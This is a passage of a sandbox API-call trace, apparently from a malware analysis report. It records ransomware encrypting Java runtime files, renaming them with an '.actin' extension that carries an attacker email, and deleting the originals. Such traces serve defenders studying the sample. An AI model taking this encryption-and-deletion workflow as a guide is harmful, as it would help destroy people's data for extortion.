Files\\Java\\jre1.8.0_144\\lib\\charsets.jar.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\charsets.jar.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0153.424] SetFilePointerEx (in: hFile=0x2f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6c0 | out: lpNewFilePointer=0x0) returned 1 [0153.424] SetFilePointerEx (in: hFile=0x2f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6c0 | out: lpNewFilePointer=0x0) returned 1 [0153.424] ReadFile (in: hFile=0x2f0, lpBuffer=0x3791058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x33ef6cc, lpOverlapped=0x0 | out: lpBuffer=0x3791058*, lpNumberOfBytesRead=0x33ef6cc*=0x40000, lpOverlapped=0x0) returned 1 [0153.434] SetFilePointerEx (in: hFile=0x2f0, liDistanceToMove=0xf7253, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6c0 | out: lpNewFilePointer=0x0) returned 1 [0153.434] ReadFile (in: hFile=0x2f0, lpBuffer=0x37d1058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x33ef6cc, lpOverlapped=0x0 | out: lpBuffer=0x37d1058*, lpNumberOfBytesRead=0x33ef6cc*=0x40000, lpOverlapped=0x0) returned 1 [0153.446] SetFilePointerEx (in: hFile=0x2f0, liDistanceToMove=0x2a56fa, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6c0 | out: lpNewFilePointer=0x0) returned 1 [0153.446] ReadFile (in: hFile=0x2f0, lpBuffer=0x3811058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x33ef6cc, lpOverlapped=0x0 | out: lpBuffer=0x3811058*, lpNumberOfBytesRead=0x33ef6cc*=0x40000, lpOverlapped=0x0) returned 1 [0153.454] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef6b0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef71c | out: phKey=0x33ef71c*=0xac3230) returned 1 [0153.454] CryptSetKeyParam (hKey=0xac3230, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0153.455] CryptEncrypt (in: hKey=0xac3230, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6d0*=0xc0060, dwBufLen=0xc0060 | out: pbData=0x3791020*, pdwDataLen=0x33ef6d0*=0xc0060) returned 1 [0153.456] CryptDestroyKey (hKey=0xac3230) returned 1 [0153.456] SetFilePointerEx (in: hFile=0x2f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f8 | out: lpNewFilePointer=0x0) returned 1 [0153.456] WriteFile (in: hFile=0x2f0, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0xc0112, lpNumberOfBytesWritten=0x33ef708, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef708*=0xc0112, lpOverlapped=0x0) returned 1 [0153.587] SetEndOfFile (hFile=0x2f0) returned 1 [0153.589] SetFilePointerEx (in: hFile=0x2f0, liDistanceToMove=0x2a56fa, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6c8 | out: lpNewFilePointer=0x0) returned 1 [0153.589] WriteFile (in: hFile=0x2f0, lpBuffer=0x385114a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x33ef6d4, lpOverlapped=0x0 | out: lpBuffer=0x385114a*, lpNumberOfBytesWritten=0x33ef6d4*=0x40000, lpOverlapped=0x0) returned 1 [0153.594] SetFilePointerEx (in: hFile=0x2f0, liDistanceToMove=0xf7253, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6c8 | out: lpNewFilePointer=0x0) returned 1 [0153.594] WriteFile (in: hFile=0x2f0, lpBuffer=0x385114a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x33ef6d4, lpOverlapped=0x0 | out: lpBuffer=0x385114a*, lpNumberOfBytesWritten=0x33ef6d4*=0x40000, lpOverlapped=0x0) returned 1 [0153.596] SetFilePointerEx (in: hFile=0x2f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6c8 | out: lpNewFilePointer=0x0) returned 1 [0153.596] WriteFile (in: hFile=0x2f0, lpBuffer=0x385114a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x33ef6d4, lpOverlapped=0x0 | out: lpBuffer=0x385114a*, lpNumberOfBytesWritten=0x33ef6d4*=0x40000, lpOverlapped=0x0) returned 1 [0153.598] CloseHandle (hObject=0x2f0) returned 1 [0153.598] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0153.598] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\sRGB.pf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\srgb.pf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0153.599] GetFileSizeEx (in: hFile=0x2f0, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=3144) returned 1 [0153.599] CloseHandle (hObject=0x2f0) returned 1 [0153.599] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\sRGB.pf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\srgb.pf")) returned 0x20 [0153.599] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\sRGB.pf.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\srgb.pf.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0153.599] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\sRGB.pf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\srgb.pf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0153.599] SetFilePointerEx (in: hFile=0x2f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0153.599] SetFilePointerEx (in: hFile=0x2f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0153.599] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\sRGB.pf.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\srgb.pf.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0153.601] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef6a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef704 | out: phKey=0x33ef704*=0xac30b0) returned 1 [0153.601] CryptSetKeyParam (hKey=0xac30b0, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0153.601] ReadFile (in: hFile=0x2f0, lpBuffer=0x3791020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x33ef72c, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesRead=0x33ef72c*=0xc48, lpOverlapped=0x0) returned 1 [0153.602] CryptEncrypt (in: hKey=0xac30b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0xc50, dwBufLen=0xc50 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0xc50) returned 1 [0153.602] WriteFile (in: hFile=0x2f4, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0xc50, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0xc50, lpOverlapped=0x0) returned 1 [0153.603] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef69c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef708 | out: phKey=0x33ef708*=0xac3470) returned 1 [0153.603] CryptSetKeyParam (hKey=0xac3470, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0153.603] CryptEncrypt (in: hKey=0xac3470, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x30, dwBufLen=0x30 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x30) returned 1 [0153.603] CryptDestroyKey (hKey=0xac3470) returned 1 [0153.603] WriteFile (in: hFile=0x2f4, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0xe2, lpOverlapped=0x0) returned 1 [0153.603] CryptDestroyKey (hKey=0xac30b0) returned 1 [0153.603] CloseHandle (hObject=0x2f0) returned 1 [0153.604] CloseHandle (hObject=0x2f4) returned 1 [0153.604] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\sRGB.pf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\srgb.pf")) returned 1 [0153.605] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0153.605] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\content-types.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\content-types.properties"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0153.605] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=5548) returned 1 [0153.605] CloseHandle (hObject=0x2f4) returned 1 [0153.605] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\content-types.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\content-types.properties")) returned 0x20 [0153.605] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\content-types.properties.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\content-types.properties.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0153.605] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\content-types.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\content-types.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0153.605] SetFilePointerEx (in: hFile=0x2f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0153.605] SetFilePointerEx (in: hFile=0x2f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0153.605] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\content-types.properties.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\content-types.properties.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0153.606] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef6a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef704 | out: phKey=0x33ef704*=0xac2df0) returned 1 [0153.606] CryptSetKeyParam (hKey=0xac2df0, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0153.606] ReadFile (in: hFile=0x2f4, lpBuffer=0x3791020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x33ef72c, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesRead=0x33ef72c*=0x15ac, lpOverlapped=0x0) returned 1 [0153.717] CryptEncrypt (in: hKey=0xac2df0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x15b0, dwBufLen=0x15b0 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x15b0) returned 1 [0153.717] WriteFile (in: hFile=0x2f0, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x15b0, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x15b0, lpOverlapped=0x0) returned 1 [0153.718] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef69c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef708 | out: phKey=0x33ef708*=0xac2db0) returned 1 [0153.718] CryptSetKeyParam (hKey=0xac2db0, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0153.718] CryptEncrypt (in: hKey=0xac2db0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x60, dwBufLen=0x60 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x60) returned 1 [0153.718] CryptDestroyKey (hKey=0xac2db0) returned 1 [0153.719] WriteFile (in: hFile=0x2f0, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x112, lpOverlapped=0x0) returned 1 [0153.719] CryptDestroyKey (hKey=0xac2df0) returned 1 [0153.719] CloseHandle (hObject=0x2f4) returned 1 [0153.719] CloseHandle (hObject=0x2f0) returned 1 [0153.719] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\content-types.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\content-types.properties")) returned 1 [0153.720] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0153.720] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_fr.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_fr.properties"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0153.721] GetFileSizeEx (in: hFile=0x2f0, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=3409) returned 1 [0153.721] CloseHandle (hObject=0x2f0) returned 1 [0153.721] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_fr.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_fr.properties")) returned 0x20 [0153.722] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_fr.properties.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_fr.properties.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0153.722] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_fr.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_fr.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0153.722] SetFilePointerEx (in: hFile=0x2f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0153.722] SetFilePointerEx (in: hFile=0x2f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0153.722] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_fr.properties.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_fr.properties.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0153.722] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef6a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef704 | out: phKey=0x33ef704*=0xac2f30) returned 1 [0153.722] CryptSetKeyParam (hKey=0xac2f30, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0153.722] ReadFile (in: hFile=0x2f0, lpBuffer=0x3791020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x33ef72c, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesRead=0x33ef72c*=0xd51, lpOverlapped=0x0) returned 1 [0153.724] CryptEncrypt (in: hKey=0xac2f30, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0xd60, dwBufLen=0xd60 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0xd60) returned 1 [0153.724] WriteFile (in: hFile=0x2f4, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0xd60, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0xd60, lpOverlapped=0x0) returned 1 [0153.725] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef69c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef708 | out: phKey=0x33ef708*=0xac2d70) returned 1 [0153.725] CryptSetKeyParam (hKey=0xac2d70, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0153.725] CryptEncrypt (in: hKey=0xac2d70, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x50, dwBufLen=0x50 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x50) returned 1 [0153.725] CryptDestroyKey (hKey=0xac2d70) returned 1 [0153.725] WriteFile (in: hFile=0x2f4, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x102, lpOverlapped=0x0) returned 1 [0153.725] CryptDestroyKey (hKey=0xac2f30) returned 1 [0153.725] CloseHandle (hObject=0x2f0) returned 1 [0153.725] CloseHandle (hObject=0x2f4) returned 1 [0153.725] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_fr.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_fr.properties")) returned 1 [0153.726] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0153.726] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_it.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_it.properties"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0153.726] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=3223) returned 1 [0153.727] CloseHandle (hObject=0x2f4) returned 1 [0153.727] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_it.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_it.properties")) returned 0x20 [0153.727] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_it.properties.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_it.properties.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0153.727] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_it.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_it.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0153.727] SetFilePointerEx (in: hFile=0x2f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0153.727] SetFilePointerEx (in: hFile=0x2f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0153.727] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_it.properties.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_it.properties.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0153.727] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef6a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef704 | out: phKey=0x33ef704*=0xac3370) returned 1 [0153.727] CryptSetKeyParam (hKey=0xac3370, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0153.727] ReadFile (in: hFile=0x2f4, lpBuffer=0x3791020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x33ef72c, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesRead=0x33ef72c*=0xc97, lpOverlapped=0x0) returned 1 [0153.729] CryptEncrypt (in: hKey=0xac3370, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0xca0, dwBufLen=0xca0 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0xca0) returned 1 [0153.729] WriteFile (in: hFile=0x2f0, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0xca0, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0xca0, lpOverlapped=0x0) returned 1 [0153.730] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef69c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef708 | out: phKey=0x33ef708*=0xac2ef0) returned 1 [0153.730] CryptSetKeyParam (hKey=0xac2ef0, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0153.730] CryptEncrypt (in: hKey=0xac2ef0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x50, dwBufLen=0x50 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x50) returned 1 [0153.730] CryptDestroyKey (hKey=0xac2ef0) returned 1 [0153.730] WriteFile (in: hFile=0x2f0, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x102, lpOverlapped=0x0) returned 1 [0153.730] CryptDestroyKey (hKey=0xac3370) returned 1 [0153.730] CloseHandle (hObject=0x2f4) returned 1 [0153.730] CloseHandle (hObject=0x2f0) returned 1 [0153.730] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_it.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_it.properties")) returned 1 [0153.731] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0153.731] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_ja.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_ja.properties"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0153.732] GetFileSizeEx (in: hFile=0x2f0, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=6349) returned 1 [0153.732] CloseHandle (hObject=0x2f0) returned 1 [0153.732] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_ja.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_ja.properties")) returned 0x20 [0153.732] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_ja.properties.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_ja.properties.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0153.732] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_ja.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_ja.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0153.732] SetFilePointerEx (in: hFile=0x2f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0153.732] SetFilePointerEx (in: hFile=0x2f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0153.732] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_ja.properties.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_ja.properties.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0153.733] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef6a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef704 | out: phKey=0x33ef704*=0xac2d70) returned 1 [0153.733] CryptSetKeyParam (hKey=0xac2d70, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0153.733] ReadFile (in: hFile=0x2f0, lpBuffer=0x3791020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x33ef72c, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesRead=0x33ef72c*=0x18cd, lpOverlapped=0x0) returned 1 [0153.734] CryptEncrypt (in: hKey=0xac2d70, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x18d0, dwBufLen=0x18d0 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x18d0) returned 1 [0153.734] WriteFile (in: hFile=0x2f4, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x18d0, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x18d0, lpOverlapped=0x0) returned 1 